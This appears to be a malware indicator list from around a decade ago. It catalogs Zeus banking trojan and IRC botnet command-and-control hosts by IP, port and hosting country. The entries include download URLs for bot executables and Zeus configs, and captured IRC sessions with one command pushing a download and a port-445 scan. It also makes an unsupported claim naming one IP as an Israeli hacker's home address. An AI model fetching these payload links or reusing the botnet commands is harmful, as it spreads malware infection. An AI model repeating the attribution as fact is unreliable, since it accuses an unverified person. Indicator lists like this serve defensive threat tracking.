ks3096360.kimsufi.com(zeus banking trojans hosted in France Ovh Systems)

ks3096360.kimsufi.com DNS_TYPE_A 94.23.232.121
Port Type: 24477 tcp
HTTP Conversations:
94.23.232.121:80 – [ks3096360.kimsufi.com]
Request: GET /Zeus/config.bin Response: 200 “OK”
74.125.224.146:80 – [www.google.com]
Request: GET /webhp Response: 200 “OK”
94.23.232.121:80 – [ks3096360.kimsufi.com]
Request: POST /Zeus/gate.php Response: 200 “OK”
Request: POST /Zeus/gate.php Response: 200 “OK”
EXE FILE: http://ks3096360.kimsufi.com/Zeus/bot.exe
hosting infos: http://whois.domaintools.com/94.23.232.121

78.188.249.114(irc botnet hosted in Turkey Istanbul Turk Telekomunikasyon Anonim Sirketi)

Remote Host Port Number
78.188.249.114 7777
MODE {KnoX|USA|564335} -ix
JOIN ##imbot## KCA
PRIVMSG ##imbot## : Exe Rarl Dosyalara Ekleniyor.
PONG HTTP1.4
NICK {KnoX|USA|564335}
USER COMPUTERNAME * 0 :COMPUTERNAME
Now talking in ##imbot##
Topic 11 On 12: [ ##imbot## ] [ .rar ]
Topic 11 By 12: [ KnX ]
hosting infos: http://whois.domaintools.com/78.188.249.114

kjrub.com(zeus banking trojan hosted in United States Hostdime.com Inc)

Israeli hacker using Zeus botnet and RAT
kjrub.no-ip.org 46.120.170.54 this is home IP for sure
Outgoing connection to remote server: kjrub.no-ip.org TCP port 101
Outgoing connection to remote server: kjrub.no-ip.org TCP port 99
Outgoing connection to remote server: kjrub.no-ip.org TCP port 1604
kjrub.com kjrub.com 64.37.52.109
Opened listening TCP connection on port: 39698
Download URLs
http://64.37.52.109/Zeus/config.bin

itconsorcium.me(zeus banking trojan hosted in Netherlands Amsterdam Leaseweb B.v)

itconsorcium.me itconsorcium.me 85.17.65.10
Opened listening TCP connection on port: 39231
Download URLs
http://85.17.65.10/system-updates/config.bin (itconsorcium.me)
http://85.17.65.10/system-updates/config.bin (itconsorcium.me)
http://kenney.cz.cc/system-updates/bot.exe
Outgoing connection to remote server: itconsorcium.me TCP port 80
Outgoing connection to remote server: itconsorcium.me TCP port 80
hosting infos: http://whois.domaintools.com/85.17.65.10

205.134.246.98(irc botnet hosted in United States Arlington Gamedata Inc)

Remote Host Port Number
205.134.246.98 9090 PASS prison
216.146.38.70 80
72.233.89.200 80
PRIVMSG {00-USA-XP-COMP-` =~@ :HTTP SET http://68.173.251.107/x.exe =~@ :SC// Sequential Port Scan started on 174.133.89.0:445 with a delay of 10 seconds for 0 minutes using 100 threads.
PONG leaf.18632.com
NICK {iNF-00-USA-XP-COMP-4138}
USER MEAT * 0 :COMP
JOIN ##hxxp##
NICK {00-USA-XP-COMP-3086}
JOIN ###meat
hosting infos:

193.107.16.121(irc botnet hosted in Seychelles Ideal Solution Ltd)

Remote Host Port Number
193.107.16.121 1234 PASS xxx
204.0.5.51 80
216.178.38.224 80
63.135.80.46 80
66.220.149.32 80
MODE NEW-[USA|00|P|24666] -ix
JOIN #!nw! test
PONG 22 MOTD
NICK NEW-[USA|00|P|24666]
USER XP-4055 * 0 :COMPUTERNAME
hosting infos: http://whois.domaintools.com/193.107.16.121

92.241.164.191(irc botnet hosted in Russian Federation Oao Webalta)

ip 92.241.164.191 port 8718
Nick taAODJGm
User nftmukqp
Channel #c
Now 15 talking in #c
Topic 11 On : [ #c ] [ =zHG1ItuZYjPiK9Yvp+PRGtG2f+HhKg4GOeRK3Pm1UmC51Uf+mWyMyq8raFlVl4bRGkmubSKgAUMpPQHZYWV1ORetyaFvLR ]
Topic 11 By 12: [ term ]
hosting infos: http://whois.domaintools.com/92.241.164.191

46.105.224.170(irc botnet hosted in France Ovh Systems)

Remote Host Port Number
213.251.170.52 80
46.105.224.170 6991
NICK New{US-XP-x86}5457206
USER 19245 “” “12420” :1586
MODE New{US-XP-x86}5457206 +iMm
JOIN #FBI
hosting infos: http://whois.domaintools.com/46.105.224.170

3vbot.no-ip.info(irc botnet hosted in Germany Hetzner Online Ag)

sexykyle.no-ip.biz
Resolved : [ sexykyle.no-ip.biz ] To [ 178.63.140.212 ]
Remote Host Port Number
178.63.140.212 1997 PASS none
NICK NEW{USA-XP-SP3}{946345}
USER 9463 “” “TsGh” :9463
JOIN #testbot
PONG :irc.L1GhTs.net
NICK New{US-XP-x86}5635115
USER 5635115 “” “5635115” :5635115
MODE New{US-XP-x86}5635115 +iMm
JOIN #aryan none
PONG :irc.L1GhTs.net
hosting infos: http://whois.domaintools.com/178.63.140.212